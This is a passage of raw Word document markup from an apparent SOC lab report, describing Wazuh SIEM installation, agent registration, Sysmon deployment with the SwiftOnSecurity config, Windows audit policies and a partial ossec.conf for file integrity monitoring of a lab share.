        <w:t xml:space="preserve">192.168.56.101</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="4196154"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Ubuntu Wazuh VM" title="" id="17" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_2_1_ubuntu_wazuh.png" id="18" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="4196154"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ðŸ”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId19">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Open High-Resolution Image</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 2.2: Windows Server 2022 Target / Victim VM (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.56.103</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="4177094"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Windows Victim VM" title="" id="21" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_2_2_windows_victim.png" id="22" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="4177094"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ðŸ”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId23">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Open High-Resolution Image</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 2.3: Kali Linux Attacker VM (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.56.102</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="4152979"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Kali Attack VM" title="" id="25" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_2_3_kali_attack.png" id="26" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="4152979"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ðŸ”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId27">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Open High-Resolution Image</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_9479ab27eb7b6b45a401f2a1d108d3c8640fefd"/>
      <w:r>
        <w:t xml:space="preserve">2.3 SIEM Installation &amp; Agent Registration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Wazuh all-in-one assistant was executed on Ubuntu Server 22.04 LTS. The underlying LVM root volume was expanded to utilize the entire 40GB virtual drive (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">lvextend -l +100%FREE /dev/ubuntu-vg/ubuntu-lv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">resize2fs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) to support OpenSearch index storage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 2.4: Successful Wazuh Manager &amp; Indexer Installation</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3975847"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Wazuh Install" title="" id="30" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_2_4_wazuh_install.png" id="31" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3975847"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ðŸ”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId32">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Open High-Resolution Image</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Wazuh Windows Agent was installed on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">WinServer-Target</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and connected to manager</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.56.101</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 2.5: Active Agent Connection in Wazuh Dashboard</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3076986"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Wazuh Agent Active" title="" id="34" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_2_5_wazuh_agent_active.png" id="35" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3076986"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ðŸ”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId36">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Open High-Resolution Image</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 2.6: Initial Wazuh SOC Telemetry Overview</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="2188664"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Wazuh Dashboard" title="" id="38" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_2_6_wazuh_dashboard.png" id="39" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="2188664"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ðŸ”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId40">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Open High-Resolution Image</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_32bbd3a7ccb8a6b619af5f07e68d48cf7248958"/>
      <w:r>
        <w:t xml:space="preserve">3. Telemetry Hardening &amp; Endpoint Instrumentation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_d420ae2d65cb3b6030e3966faf20c6ebba52397"/>
      <w:r>
        <w:t xml:space="preserve">3.1 Sysmon Deployment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Microsoft Sysmon v15 was deployed with the SwiftOnSecurity configuration schema to monitor process creation, command lines, hashes, and parent process trees:</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OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Path </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"C:\Tools"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Set-Location</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"C:\Tools"</w:t>
      </w:r>
      <w:r>
        <w:br/>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"https://live.sysinternals.com/Sysmon64.exe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">OutFile </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"C:\Tools\Sysmon64.exe"</w:t>
      </w:r>
      <w:r>
        <w:br/>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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"https://raw.githubusercontent.com/SwiftOnSecurity/sysmon-config/master/sysmonconfig-export.xml"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">OutFile </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"C:\Tools\sysmonconfig.xml"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\Sysmon64</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accepteula </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">i sysmonconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">xml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_66ba511982ef0703c05631836c2ea9b85b63c6b"/>
      <w:r>
        <w:t xml:space="preserve">3.2 Advanced Windows Audit Policies</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The following local security policies were enabled (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">secpol.msc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Audit Process Creation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Enabled with command-line auditing (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrative Templates\System\Audit Process Creation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Audit File System:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Enabled (Success &amp; Failure).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Audit Logon / Logoff:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Enabled (Success &amp; Failure).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_f99f0992f4e029d09878b672ca0fa492c8a864e"/>
      <w:r>
        <w:t xml:space="preserve">3.3 Wazuh Agent Configuration (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ossec.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The agent was configured to monitor the sensitive share</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Finance</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">using real-time File Integrity Monitoring (FIM) and to ingest Sysmon operational logs:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ossec_config</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;192.168.56.101&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;1514&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">protocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;tcp&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">protocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">notify_time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;10&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">notify_time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
